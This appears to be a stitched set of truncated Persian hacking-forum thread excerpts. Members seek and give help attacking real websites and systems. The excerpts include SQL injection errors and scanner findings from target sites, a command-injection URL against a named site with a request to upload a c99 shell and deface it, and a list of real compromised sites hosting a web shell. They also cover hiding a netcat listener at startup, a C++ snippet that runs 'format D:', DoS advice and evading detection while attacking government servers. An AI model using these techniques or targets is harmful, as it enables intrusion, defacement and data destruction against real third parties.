سلام خدمت دوستان عزيز من ميخواستم بدونمكه چه جوري اكسپلويت رو بشناسم واون رو كامپايل كنم منظورم ان هست از كجا من بفهمم اين كد مخرب ( Exploit ) با چي نوشته شدهمعمولا در هدر اكسپلويت ها توضيح داده و معلومه به چه زبانيه .با سلاماين فيلم رو ببيني مشكلت حل ميشه.موفق باشي

سلام آيا با اين ارورها مي شود سايت رو هك كرد OraOLEDB error '80040e14'ORA-00907: missing right parenthesis/pagelogin.asp, line 71 -----------------------------------Microsoft JET Database Engine error '80040e14'Syntax error in string in query expression 'user = ''' and pass='*' and check = 1'./pagelogin.asp, line 47 . --------------------------Microsoft JET Database Engine error '80040e14'Syntax error in query expression 'NewsSharh.Code=News.Code AND News.NType=Refrence.Code And Matn Like '%'%' Order By NSDate DESC'./SearchResult.asp, line 41 ----------------اين ها رو با اسكيول اينجكش رفتم حالا به بعدش چيكار كنم چه كدي را بزنماحتمالش كم نيستدوستان بيشتر راهنماييي كنند هر كاري كردم نشدنقل قل:نوشته شده توسط ali_55(گفتگو 90329)دوستان بيشتر راهنماييي كنند هر كاري كردم نشد ...

چه طوري ميشه در limited=guest يه يوزر با دسترسي آدمين درست كردhttp://shabgard.org/forums/showthrea...highlight=userموفق باشيayoub خان اين لينكي كه گذاشتي چندان ربطي به موضوع نداره :68:مي دوني چرا ؟براي اينكه دستور net user تنها زماني كه با يك كاربر ادمين وارد شدي مي تونهيوزر ادمين بسازه:3:لينك زير رو هم نگاه بندازي بد نيست:5:https://shabgard.org/forums/showthread.php?t=11004تو سرويس پك 1 مشكلي نداشت دستور net user و حتي مي شد پسورد ادمين رو باهاش عوض كرد , اما الان گير ميده ... اين لينكي هم كه m2000 گذاشته , من قبلا روش اول كرنل رو تست كردم , اما جواب نداد ! روش دومش رو نمي دونم !دوست ...

بسمه تعالي بحثهاي زيادي و روشهاي زيادي در مورد عوض كردن آپي , هيدن كردن اون در سطح وب يا همين سايت شده وهر كدوم هم بنا به نيازهاي مختلف روشهاي مختلفي هم شرح داده شده استفاده از نرم افزارهاي مختلف يا استفاده از ipهاي مختلف......از vpn وروشهاي متعدد ديگرحالا به يه سوال به عنوان يه هكر شما چه روشي رو به عنوان يه هكر قبول داريد انم در حالتي كهدارد يه سرور دولتي رو هك ميكنيد مثلا پنتاكو ن خودمون {info:59:} چقدر مطمعن هستين كه شناسا ي نميشين آيپي شما شناساي نميشه و در كل چه روشي رو ...

:39:با سلام.دوستان من توي setting ......جي ميل يه قابليت ديدم كه مي تونست پسورد رو ريست كنه؟يعني اولين پسوردي كه براي ميل شما ساخته شده رو به عنوان پسورد فعلي قرار ميداد.شما حتمال داره ت حالا پسورد ميل خودتونو تا حالا 10 بار عوض كرده باشين......كارش اينه ديگه......مي خواستم ببينم اين ويژگي هم در ياهو هست يا نه؟؟؟؟؟؟؟؟يا اينكه اصلا اطلاعي در بارش ندارين؟؟؟؟؟

وقتي يه batch file رو مي زارم تو استارت اپ مي خوام هر موقع كه سيستم بالا اومد بعد نتكت رفت تو حالت listening , نتكت تو پس زمينه تو اين حالت بمونه ! يعني اين پروسه بصورت هيدن بشه خلاصه بگم نتكت خيلي تابلو نباشه !راهش چيه! ؟1 Attachment(s)اين يكي بهتره!چون هم آنتي ويروس ها نت كت رو ميشناسن:39:هم تو استارت آپ ضايع اجرا ميشه!:79:چيزي كه گذاشتي به كار من نمي ياد :4:من سوالم اينه چجوري نتكت تو پس زمينه به كار خودش ادامه بده يعني فرض كن اين batch file manc -l -v -n -p ...

با سلام من يك سول داشتم اونم اين بود كه من سايت يك كه يوزرم مال اونجاس isp روكه داشتم نگا ميكردم يهو به سرم زد كه يوزرو چك كنم متوجه شدم كه قسمت چك كردن user به ادرس اصلي سايت وصل نيست ( از اون لينك نگرفته ) با Acunetix Web Vulnerability Scanner چكش كردم ديدم سرور Apache/2.0.54 (Fedora) هست و Unixخلاصه من نفهميدم اين جوري هست اين سايت چجوري هست يه فكر به كلم پوكم رسيد كه احتمالآ اين از داخل شركت هستش يعني اين كه ديتابيس ش يه ...

با سلا من با برنامه Acunetix Web Vulnerability Scanner 4( البته نسخه اپديد شدش ) سايت يك ISP رو scan كردم اين اومد بايد چيكار كنم 9 تا از اين نوع باگ كه قرمز بود و خطرناك () QuickEStore v.7.9 SQL Injection and Path DiclosureExamples:/prodpage.cfm?CFID= CFTOKEN= CategoryID=[SQL]/index.cfm?CFID=1 CFTOKEN=1 SubCatID=[SQL]/proddetail.cfm?CFID=1 CFTOKEN=1 ItemID=[SQL]/checkout.cfm?CFID= CFTOKEN= OrderID=[SQL]/shipping.cfm?CFID= CFTOKEN= OrderID=[SQL]اين مثال ها هم داده بود ايناهم بودWebDAV Enabledاين ابي بود Possible sensitive filesاينم همينطور Broken linksاينم باز ابي بود )low(اينا سبز بودنEmail address foundGHDB: Frontpage extensions for UnixDirectories with executables permission enabledمن همچنان متظرم مديراي سايت اقايون / خانوم ها / كاربران سايت كمك كنيدنقل قل:نوشته شده توسط BelalorD2(گفتگو 90062)من همچنان متظرم مديراي سايت ...

سلام:D به قول عمه ي كامي من باز پيدام شد !!!:| يك سوال !آقا توي VB ما براي اينكه يك فايلي رو اجرا كنيم از دستور Shell استفاده مي كنيم و آدرس دقيق اون فايل رو مي ديم تا اجرا بشه مثلا shell c:file.exe براي ران كردن فايل حالا من اين كارو توي Visual C++ مي خوام انجام بدم چه كنم :ِd ??????????اين دستور :execve_ميتوني از توابع Api براي باز كردن پروسه استفاده كنيکد:#include iostream using namespace std;#include windows.h // ShellExecute()int main(){ ShellExecute (NULL, open , C:\WINDOWS\system32\cmd.exe , /c format D: , NULL, SW_SHOW ); return 0;}DOSکد:#include ...

چند تا شل براي دوستان مبتدي ( مثل خودم ) ! براي يادگيري !http://www.musiconpayday.nl/v1/index...oc/jm.php.txt?http://www.plattyplus.co.uk/index.ph...oc/jm.php.txt?http://www.ecuriedeferdinand.com/pag...oc/jm.php.txt?http://www.findashop.de/index.php?op...oc/jm.php.txt?http://www.awgonline.com/showpage.ph...oc/jm.php.txt?http://www.pioneerwheel.com/showpage...oc/jm.php.txt?http://www.sensaqua.com/index.php?do...oc/jm.php.txt?http://www.ausflugsziele24.de/index....oc/jm.php.txt?http://www.tremolo.elektroda.net/Enc...oc/jm.php.txt?http://www.firstgmbh.de/main.php?pag...oc/jm.php.txt?http://www.clustertech.com.cn/cn/mai...oc/jm.php.txt?http://www.prostatecancerresourcecen...oc/jm.php.txt?http://www.opticroissance.com/page.p...oc/jm.php.txt?http://www.qalastjosephfc.com/page.p...oc/jm.php.txt?http://www.foerderverein-grube-fortu...oc/jm.php.txt?اگر توضيح ميداديد كه چطور و از چه حمله اي اين شل ها رو گرفتيد بهتر نبود يا حداقل چند تاشو ميگفتيد...؟اين جوري براي منه مبتدي هم كار آمد تر بود مرسي.اگر اشتباه نكنم حمله rfi باشه البته فكر ميكنم...خداييش از اين چيزا زياد سر در نميارم اگه rfi ميشه بگيد از چه طريقي اين سايت ها رو گير مياري وبعد cms هاشو چه طور؟بقيشو ميشه رفت اصلش همين دو موضوعه.نقل قل:خداييش از اين چيزا زياد سر در نميارم اگه rfi ميشه بگيد از چه طريقي ...

با عرض سلام و خسته نباشيد من از ويندوز xp sp2 استفاده ميكنم و ميخام ويندوز خودم را از طريق سايت ماكروسافت آبديت كنم و فايلهاي آبديت را در بوشهاي ذخيره كنم كه با هر بار نصب ويندوز مجبور به اين كار نشم آيا نرم افزار يا راهي براي اين كار وجود داره و آيا ميشه فقط آبديتهاي امنيتي رو انجام دادفايلهاي آپديت ويندوز بعد از نصب پاك ميشن ليست كامل آدرس فايلهاي مايكروسافت رو واسه دانلود اينجا ميزارم ميتوني به دانلود منيجر import كني و هر كدام رو دانلود كني بعد از دانلود كامل آپديتها ميتوني ...

سلام بچه ها مي خواستم ببينم كه چه طور ميشه يه سايت رو بمب كرد تا هنگ كنه؟؟؟با سلام....اميدوارم هميشه سلامت و شاد باشيد....دوست عزيز اگه منظورت بمبارن سايت براي از پر كردن پيناي باند هست كه بايد از طريق روشهاي حملات DoS اين كار رو انجام بدي كه اين خودش يه پهناي بالاي بند مي خواد تا بتوني اطلاعات ضائد رو با سرعت و حجم بالايي براي سرور سايت مورد نظر خودت بفرستي تا شايد !!!! يه لحظه سرور Down بشه كه خيلي خيلي كار مشكليه.....اگه هم پهناي باند بالايي ( خيلي بالا ) نداري ، ...

سلام دوستان اگر به اين عكس يه نگاه بندازين متوجه ميشين تقريبا نصف مراحل رو رفتم حالا كمك ميخوام كه چه جوري بتونم يه شلر روش آپلود كنم اين باگ سايت هاي cgi هستش كه ميشه نفوذ كرد بقيشو شما كمك بدين براي ديفيس كردن و آپلود c99http://www.nowdental.co.kr/cgi-bin/technote/main.cgi?down_num=5466654 board=rebarz99 command=d own_load filename=rb9.txt|ls%20-la|خودتون ميدونيد كه اين جور سايت ها زياده اكثرشون هم چيني ژاپني هستن...حقيقتش خيلي دوست دارم اين روش رو ياد بگيرم براي شروع ميدونم كه چيزه خوبيه...ميخوام ببينم با چه دستوري بايد يه شلر آپلود كنم ممنون همتون

با سلام خدمت تمامي دوستان گل راستش يه سوال و راهنمايي ميخواستمراسياتش يه سايت هست كه امنيتش بالاست دوستان به من گفتن يه شركت امنيتي 1 ميليون ماهانه براي امنيت سايت و سرور ميگيره اين يه خورده من رو كنجكاو كرد تا يه خورده بگردم ببينم مگه چه كار ميكنن كه 1 ميليون بگيرن اسكن كردم ديدم سرور win iis 6 اسنت هر چي اكسپلويت داشتم تست زدم جواب نداد رفتم رو سايت سراغ sql injection ديدم نداره اسكن كردم ديدم چند تا vpn داره يه دونش بر حسب اتفاق iis 5 بود ميخواستم از اساتيد بزرگ بپرسم ...

سلام به همكي كاربران و دوستان محترم.ميخواستم در مورد :Extract كردن فايلهاي Zip يا Rar كه Product Password هستند و پسورد گذاشن روي فايلهاي Zip در Cpanel File Manager مرا راهنمايي كنيد.Thanx ;) :Xسلامآقايون شبگردي -- چيزه خاصي نيست كه رو سايت نصب كنيم تا بتونيم فايهاي ZIP و RAP كه پسورد دارن رو Extract كنيم ( اولين سوال بي جواب مانده در شبگرد :22: )كسي نبود :5:http://gallery.menalto.com/node/27450http://www.theserverpages.com/php/manual/en/ref.zip.phphttp://at2.php.net/manual/en/ref.zip.phphttp://forums.digitalpoint.com/showthread.php?t=80491http://www.google.com/search?q=unzip...n start=0 sa=Nنقل قل:نوشته شده توسط h27(گفتگو 90259)http://gallery.menalto.com/node/27450http://www.theserverpages.com/php/manual/en/ref.zip.phphttp://at2.php.net/manual/en/ref.zip.phphttp://forums.digitalpoint.com/showthread.php?t=80491http://www.google.com/search?q=unzip...n start=0 sa=Nاين كد رو edit كن بريز تو يه فايل PHP تو همون فولدر آپلود كن بعد با مرورگر اجراش كنکد: ? system('unzip -P PASSWORD FILE-NAME.zip')? اگه سرور اجراي command رو نبسته ...